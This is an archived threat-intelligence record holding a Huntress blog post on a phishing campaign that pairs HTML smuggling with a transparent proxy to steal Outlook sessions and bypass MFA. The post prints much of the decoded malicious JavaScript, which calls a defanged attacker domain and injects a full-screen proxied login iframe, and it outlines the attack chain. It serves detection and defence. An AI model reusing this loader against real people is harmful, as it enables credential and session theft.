{
	"id": "a1f30344-9932-4ebf-bc6e-f57a4d31402f",
	"created_at": "2026-04-06T00:21:57.363365Z",
	"updated_at": "2026-04-10T03:31:13.72455Z",
	"deleted_at": null,
	"sha1_hash": "6c55378b99126269046d4b1e27657ac03a0286c2",
	"title": "Smuggler’s Gambit: Uncovering HTML Smuggling Adversary in the Middle Tradecraft",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2511371,
	"plain_text": "Smuggler’s Gambit: Uncovering HTML Smuggling Adversary in the\r\nMiddle Tradecraft\r\nBy Matt Kiely\r\nPublished: 2024-05-23 · Archived: 2026-04-05 23:23:16 UTC\r\ntl;dr\r\nHuntress uncovered the infrastructure of a mass phishing campaign including potentially novel tradecraft that combines\r\nHTML smuggling, injected iframes, and session theft via transparent proxy. This technique allows an attacker to steal\r\ncredentials and bypass MFA if a victim logs into a transparently proxied, locally rendered iframe of the Outlook login portal.\r\nThis technique is novel to us, at least, and we haven’t seen any examples of it before (if you have, I’d love to hear about it:\r\nmatt.kiely[@]huntresslabs.com). We submitted a takedown request to NameCheap for all identified domains. There are\r\nprobably still more out there. ATT\u0026CK matrix items and IoCs are at the bottom of this blog. Protect your neck.\r\nWatch Matt Kiely discuss this tradecraft.\r\nBackground\r\nOn May 21, 2024, Huntress identified three domains of interest from our Identity Threat Detection and Response telemetry.\r\nThe three domains are listed below. Does anything stick out immediately?\r\nhxxps://rnsnno.szyby[.]pro/ \r\nhxxps://rnsnno.kycmaxcapital[.]pro/\r\nhxxps://rnsnno.2398-ns[.]pro/\r\nAll three of these URLs use the same subdomain and the same top-level domain, but different domain names. Additional\r\nresearch unveiled that the three domains had been registered via NameCheap the day prior to their discovery on May 21:\r\nhttps://www.huntress.com/blog/smugglers-gambit-uncovering-html-smuggling-adversary-in-the-middle-tradecraft\r\nPage 1 of 15\n\nhttps://www.huntress.com/blog/smugglers-gambit-uncovering-html-smuggling-adversary-in-the-middle-tradecraft\r\nPage 2 of 15\n\nhttps://www.huntress.com/blog/smugglers-gambit-uncovering-html-smuggling-adversary-in-the-middle-tradecraft\r\nPage 3 of 15\n\nHaving spent time behind the console of transparent proxies as a red teamer, this set off all kinds of alarms for me.\r\nNameCheap remains one of the most prolific domain registrars for adversary activity, emulated or otherwise. But the\r\ndomain names and ages alone didn’t support the hypothesis that these were true evil yet, so we had to do some more recon.\r\nPoking at the web root of one of the servers revealed the landing page redirects to hxxps://example[.]com, which is a benign\r\nexample landing page used for web app demonstration.\r\nMore detective work by our fearless SOC leader Max Rogers and CTI analyst `TP5` uncovered several more interesting\r\nentities associated with one of the three identified suspicious domains (rnsnno.szyby[.]pro). By examining the VirusTotal\r\nrelations dashboard for this domain, we identified an HTML payload file (sha265:\r\nhttps://www.huntress.com/blog/smugglers-gambit-uncovering-html-smuggling-adversary-in-the-middle-tradecraft\r\nPage 4 of 15\n\n18470571777CA2628747C4F39C8DA39CA81D1686820B3927160560455A603E49) that contacted several domains upon\ndetonation, including rnsnno.szyby[.]pro. The full list of domains found in this payload file is available in the appendix.\nWait… an HTML payload file? What’s up with that?\nHTML Smuggling is a tried and true payload delivery mechanism favored by threat actors who wish to bypass modern\ndefenses. Instead of phishing the target with an executable, for example, a threat actor phishes the target with an HTML file.\nWhen the victim opens the HTML file on their endpoint, the HTML and JavaScript of the file serve an embedded payload to\nthe user via their web browser. This payload is often encoded or encrypted and dynamically reassembled within the browser,\nthen served to the user as a download. This is often a second stage payload, credential stealer, or some other type of\ninfectious malware. The advantages of HTML smuggling make it a favored tactic as it allows payloads to evade defensive\ntechnology that blocks by file extension.\nA telltale sign of an HTML smuggling payload is the presence of dynamically rendered encoded/encrypted text within the\noriginal HTML file. The JavaScript document.write() function is often used to decode and render HTML and additional\nJavaScript dynamically when the document is loaded into the client browser. This is exactly what we were greeted with\nwhen we opened the HTML file of interest:\nOf note here:\nThe base64 encoded text in the first document.write() call sets up the title of the document. It is nothing special,\nbesides using the Latin slashed O unicode character in the two O’s of the word “Outlook”:\nOutløøk The block of base64 encoded text used in the second document.write() call, however, is paydirt from a malware\nanalysis perspective (URLs have been defanged):\n\n.replace('-----END PUBLIC KEY-----', '')\r\n.replace(/\\s+/g, '');\r\nconst byteArray = atob(base64String).split('').map(char =\u003e char.charCodeAt(0));\r\nreturn new Uint8Array(byteArray);\r\n}\r\nfunction arrayBufferToBase64(buffer) {\r\nlet binary = '';\r\nlet bytes = new Uint8Array(buffer);\r\nfor (var i = 0; i \u003c bytes.byteLength; i++) {\r\nbinary += String.fromCharCode(bytes[i]);\r\n}\r\nreturn window.btoa(binary);\r\n}\r\nlet sx = \"hxxps://rnsnno.vcsar[.]pro/?eymmdgau\";\r\nconst PUBLIC_KEY_PERM = `-----BEGIN PUBLIC KEY-----\r\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAynOl4t1+Seg3nPAGzBC2\r\nBEZWeNGzNKMPWab/6Fy/1AdQJNNe9JKgsi1Hji+5vRxf5DRLn4XP5ldvZN2MfwaY\r\nkww/N/njzuE//K8fOsm8/xjvHskc0zsjjnpwBQh9PlyRWhI0K3dIscZXoCiZXtrn\r\naLYRGSFC1MFm/OUF6lhckG67EUMqsPc7I5bJQaMG8tardzficKIFiE11kpe2R92q\r\nvcOHTY2jqkjx6Ga23gLy+3AWvJPgQpdbE/+ZB6ecuhxnP48CR4dHsupuXYkQaX+q\r\nEbjt96Jpo0cyYyKZG01NFStoc88avqsY5EdqCNcFDKEQ8XYmzCKAWUU4NGePnmYw\r\nvQIDAQAB\r\n-----END PUBLIC KEY-----\r\n`\r\nconst publicKey = pemToUint8Array(PUBLIC_KEY_PERM)\r\nlet el1 = document.getElementById(\"degag\");\r\nlet tl1 = el1.innerText;\r\nif (!tl1 || tl1 === eval(`'E'+'MAIL'+'_'+'CODE'`)) {\r\nsx = sx\r\nhttps://www.huntress.com/blog/smugglers-gambit-uncovering-html-smuggling-adversary-in-the-middle-tradecraft\r\nPage 6 of 15\n\n} else {\r\nsx = sx + '\u0026qrc=' + tl1\r\n}\r\nlet lTime = 0\r\nconst eD = document.getElementById(\"errorId\");\r\nlet xhr = new XMLHttpRequest();\r\nwindow.crypto.subtle.importKey(\r\n\"spki\",\r\npublicKey,\r\n{\r\nname: \"RSA-OAEP\",\r\nhash: \"SHA-256\"\r\n},\r\nfalse,\r\n[\"encrypt\"]\r\n).then(publicKeyMaterial =\u003e {\r\nconst userData = JSON.stringify({ ip: '', userAgent: navigator.userAgent})\r\nconst encodedUserAgent = new TextEncoder().encode(userData);\r\nreturn window.crypto.subtle.encrypt(\r\n{\r\nname: \"RSA-OAEP\"\r\n},\r\npublicKeyMaterial,\r\nencodedUserAgent\r\n);\r\n}).then(encryptedUserAgent =\u003e {\r\nconst encryptedUserAgentBase64 = arrayBufferToBase64(encryptedUserAgent);\r\nxhr.open('GET', sx, true);\r\nxhr.setRequestHeader(\"accept\", \"application/json\");\r\nxhr.setRequestHeader(\"qrc-auth\", encryptedUserAgentBase64);\r\nhttps://www.huntress.com/blog/smugglers-gambit-uncovering-html-smuggling-adversary-in-the-middle-tradecraft\r\nPage 7 of 15\n\nxhr.send();\r\n})\r\nxhr.onreadystatechange = function() {\r\nif (xhr.readyState === XMLHttpRequest.DONE) {\r\nif (xhr.status === 200) {\r\nconst cc = JSON.parse(xhr.responseText)\r\nconst jq = document.createElement('iframe');\r\nif (cc.url) {\r\njq.width = '100%';\r\njq.height = '500px';\r\njq.setAttribute('sandbox', 'allow-scripts allow-presentation allow-same-origin allow-popups-to-escape-sandbox\r\nallow-forms allow-top-navigation-by-user-activation');\r\njq.setAttribute('allowfullscreen', 1);\r\njq.setAttribute('style', 'none')\r\njq.onload = function() {\r\nif (lTime === 0) {\r\nconsole.log('1 fired')\r\nlTime +=1\r\n} else {\r\nconsole.log('2 fired')\r\njq.setAttribute('style', 'position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none;\r\nmargin:0; padding:0; overflow:hidden; z-index:999999;');\r\n// document.body.replaceChild(document.body.firstChild, jq);\r\n}\r\n};\r\ndocument.body.appendChild(jq);\r\njq.src = cc.url\r\nhttps://www.huntress.com/blog/smugglers-gambit-uncovering-html-smuggling-adversary-in-the-middle-tradecraft\r\nPage 8 of 15\n\n} else {\r\neD.innerText = cc.error? cc.error : 'ACCESS DENIED';\r\neD.style.display = \"block\";\r\n}\r\n} else {\r\neD.innerText = 'CONNECTION FAILED';\r\neD.style.display = \"block\";\r\n}\r\n}\r\n};\r\n\u003c/script\u003e\r\n\u003chtml\u003e\r\nAmong other activities, this block of JavaScript retrieves an iframe from a remote server and renders it to the page. When\r\nthis HTML file is opened, the user sees the Outlook loading page followed by the Outlook authentication portal:\r\nhttps://www.huntress.com/blog/smugglers-gambit-uncovering-html-smuggling-adversary-in-the-middle-tradecraft\r\nPage 9 of 15\n\nTo recap: this HTML file is phished to the target and, once downloaded, resides locally on the victim’s machine. When it’s\r\nopened, it opens the default browser and renders the HTML present in the local file. This HTML contains a number of\r\ndocument.write() calls that decode and inject additional HTML and JavaScript into the document object model. When this\r\nroutine completes, the user sees the Outlook login portal that prompts them for their password. Interestingly, the username\r\nprompt has already been pre-filled with a targeted user’s email address, so all they have to do is input their password.\r\nBut the question remains: how is this weaponizable? Closer inspection revealed that the Outlook authentication portal is\r\ninjected as an iframe directly into the browser:\r\nhttps://www.huntress.com/blog/smugglers-gambit-uncovering-html-smuggling-adversary-in-the-middle-tradecraft\r\nPage 10 of 15\n\nInspecting the network traffic when the document is rendered reveals several network callouts. Many of these network\r\ncallouts are made to shady domains, but include trailing URI components of legitimate Microsoft infrastructure. For\r\nexample, one network request is hxxps://rnsnno.pristineitems[.]pro/owa/?login_hint=[targeted user’s email], which includes\r\na shady domain (rnsnno.pristineitems[.]pro) but also includes a call to the OWA endpoint with a login_hint parameter.\r\nAn additional request included the URL hxxps://rnsnno.vcsar[.]pro/?eymmdgau\u0026qrc=[base64 encoded email of the target]\r\nWe were able to successfully coerce the suspicious infrastructure to produce a new login page specific to one of our testbed\r\nusers by injecting the username into the ?qrc= URL parameter:\r\nhttps://www.huntress.com/blog/smugglers-gambit-uncovering-html-smuggling-adversary-in-the-middle-tradecraft\r\nPage 11 of 15\n\nNow we’re cooking on a convection stove 🔥 This test outcome basically told us everything that we needed. So what is\r\nactually going on here?\r\nHTML Smuggling + Adversary in the Middle = 😈\r\nThere is more to the HTML smuggling payload, but our initial analysis was more than enough to draw a firm hypothesis:\r\nThe HTML payload injects an iframe of the legitimate Microsoft authentication portal, which is what the user sees\r\nwhen they open the HTML file.\r\nHowever, it is injecting the iframe of the login portal page by retrieving it from enemy-controlled infrastructure.\r\nBecause the login portal is decorated with the actual CSS and company branding of a targeted company, our\r\nhypothesis is that this is not a simple site clone. Instead, we hypothesize that this infrastructure is presenting an\r\niframe that transparently proxies login requests. Injecting an arbitrary user into the shady domain’s URL parameters\r\nand seeing the resulting login page was enough to prove that this is a proxy, not a site clone.\r\nIn other words, the login page the victim sees is the legitimate Outlook login page, but it is proxied through enemy-controlled infrastructure, which allows for session token theft and MFA bypass if a victim were to input their username,\r\npassword, and MFA code.\r\nOur hypothesis for the actual attack is the following: \r\nThe attacker phishes the victim with an HTML file payload.\r\nThe victim opens it on their own host.\r\nThe HTML smuggling payload renders JavaScript into the client browser, which fetches and embeds an iframe of the\r\nlegitimate Outlook login portal.\r\nThis iframe is proxying the login traffic through attacker controlled infrastructure.\r\nThe victim logs in with their username, password, and MFA if applicable, which produces a session token that is then\r\nstolen by the adversary in the middle.\r\nhttps://www.huntress.com/blog/smugglers-gambit-uncovering-html-smuggling-adversary-in-the-middle-tradecraft\r\nPage 12 of 15\n\nThis allows the attacker to log in as that user by injecting the stolen token into their own browser, bypassing the\r\nrequirement for MFA and authenticating as the victim.\r\nTl;dr: This has the hallmarks of an MFA-bypass Adversary in the Middle transparent proxy phishing attack, but\r\nuses an HTML smuggling payload with an injected iframe instead of a simple link. And that is scary.\r\nI’ll be real with you; I’ve run (authorized, legal) red team campaigns that used HTML smuggling to install a beacon on a\r\ntarget endpoint. I’ve also run campaigns that used transparent proxies to steal a target’s session. Both of those tactics are\r\nremarkably effective. But I never once thought about combining them. Frankly, this is a brilliant TTP and I’d like to make\r\nsure as many people know about it as possible so we can burn it to the ground.\r\nAdversary Tooling\r\nAt this time, the Huntress research team is not 100% confident about the actual tool used for this campaign. We can\r\nconfidently rule out Evilginx, however, due to the differences in the lure pattern, URL parameter pattern, and existence of\r\nkeyed payload HTML files. It is possible that this is one of the newer Phishing as a Service frameworks, but more research\r\nis needed to draw a conclusion one way or the other. In the interest of time, the Huntress research team is eschewing this\r\ndetermination in favor of getting the word out about the actual payload mechanism and how it works.\r\nIf this is not actually a new phishing technique, it is at least new to Huntress, which means it will likely be new to our\r\npartners. If any researchers have more information on the specifics of the tradecraft on display, please email me directly and\r\nI’d love to hear it (matt.kiely[@]huntresslabs.com).\r\nWhat is Huntress Doing?\r\nSo far, we have submitted takedown requests to NameCheap with all identified infrastructure. NameCheap is often quite\r\ncooperative with their takedown requests, so we anticipate that the identified enemy infrastructure will be burnt in short\r\norder. But there will be more on the way, so we are using our telemetry to submit more requests as we find them. \r\nWhat Can I Do?\r\nHTML files are extremely dangerous. If you didn’t expect to receive an HTML file from someone via email, take caution\r\nwhen handling it and contact your IT/security department. Do not ever enter your credentials into a login portal without\r\nverifying that it is the correct URL and domain that you expect (e.g. login.microsoftonline.com or the equivalent).\r\nIf you suspect you or anyone you know has been hit by a smooth smuggler, even if you’re not a Huntress protected\r\ncustomer, email me directly (matt.kiely[@]huntresslabs.com). We fear this is a lot more widespread than what we’ve\r\nobserved already and any information will help us combat this new identity tradecraft.\r\nWe weren’t even looking for this specifically and ended up finding a potentially novel type of identity attack. Interested in\r\nlearning about all of the shady stuff we catch when we are looking out for you? Feel free to start a trial with us!\r\nAppendix\r\nATT\u0026CK\r\nTactic Technique Description\r\nObfuscated Files or\r\nInformation\r\nHTML\r\nSmuggling\r\nAdversaries are using HTML smuggling to present a proxied login portal\r\nto victims.\r\nN/A\r\nSteal Web Session\r\nCookie\r\nAdversaries are injecting iframe rendered login portals that route\r\nauthentications through transparent proxies to steal sessions.\r\nAdversary-in-the-Middle\r\nN/A\r\nAdversaries are using injected iframes to render login portals that route\r\nauthentications through transparent proxies to steal sessions.\r\nIndicators of Compromise\r\nhttps://www.huntress.com/blog/smugglers-gambit-uncovering-html-smuggling-adversary-in-the-middle-tradecraft\r\nPage 13 of 15\n\nIoC Type Indicator Hash\r\nHTML\r\nSmuggling\r\nPayload\r\n[REDACTED ORG NAME]\r\nremittance 05212024.html\r\n18470571777CA2628747C4F39C8DA39CA81D1686820B3927160560455A\r\nAitM/Phishing\r\nInfrastructure\r\nhxxps://rnsnno.2398-ns[.]pro/ N/A\r\nAitM/Phishing\r\nInfrastructure\r\nhxxps://rnsnno.kycmaxcapital[.]pro/ N/A\r\nAitM/Phishing\r\nInfrastructure\r\nhxxps://rnsnno.szyby[.]pro/ N/A\r\nAdditional Domains\r\nNote: these domains are not all confirmed to be malicious and many of them are legitimate services. These listed\r\ndomains were found in the HTML smuggling payload and are presented for context and string matching.\r\nAMS-efz.ms-acdc.office[.]com\r\naadcdn.msauth[.]net\r\naadcdn.msftauth[.]net\r\naadcdn.msftauthimages[.]net\r\nautologon.microsoftazuread-sso[.]com\r\nbovdrrqkblhbfk[.]local\r\nclientservices.googleapis[.]com\r\ncontent-autofill.googleapis[.]com\r\ncs1100.wpc.omegacdn[.]net\r\nedgedl.me.gvt1[.]com\r\nidentity.nel.measure.office[.]net\r\nihscshtfplb[.]local\r\nlogin.live[.]com\r\nooc-g2.tm-4.office[.]com\r\noutlook.ms-acdc.office[.]com\r\noutlook.office365[.]com\r\npart-0039.t-0009.t-msedge[.]net\r\npasswordreset.microsoftonline[.]com\r\nr3.i.lencr[.]org\r\nr4.res.office365[.]com\r\nrnsnno.szyby[.]pro\r\nrnsnno.vcsar[.]pro\r\nhttps://www.huntress.com/blog/smugglers-gambit-uncovering-html-smuggling-adversary-in-the-middle-tradecraft\r\nPage 14 of 15\n\nscxgcytrl[.]local\r\nshed.dual-low.part-0039.t-0009.t-msedge[.]net\r\ntse1.mm.bing[.]net\r\nx1.i.lencr[.]org\r\nWatch Matt Kiely discuss this tradecraft.\r\nSpecial thanks to Max Rogers and `TP5` for their outstanding detective work and contributions. \r\nSource: https://www.huntress.com/blog/smugglers-gambit-uncovering-html-smuggling-adversary-in-the-middle-tradecraft\r\nhttps://www.huntress.com/blog/smugglers-gambit-uncovering-html-smuggling-adversary-in-the-middle-tradecraft\r\nPage 15 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.huntress.com/blog/smugglers-gambit-uncovering-html-smuggling-adversary-in-the-middle-tradecraft"
	],
	"report_names": [
		"smugglers-gambit-uncovering-html-smuggling-adversary-in-the-middle-tradecraft"
	],
	"threat_actors": [
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434917,
	"ts_updated_at": 1775791873,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6c55378b99126269046d4b1e27657ac03a0286c2.pdf",
		"text": "https://archive.orkl.eu/6c55378b99126269046d4b1e27657ac03a0286c2.txt",
		"img": "https://archive.orkl.eu/6c55378b99126269046d4b1e27657ac03a0286c2.jpg"
	}
}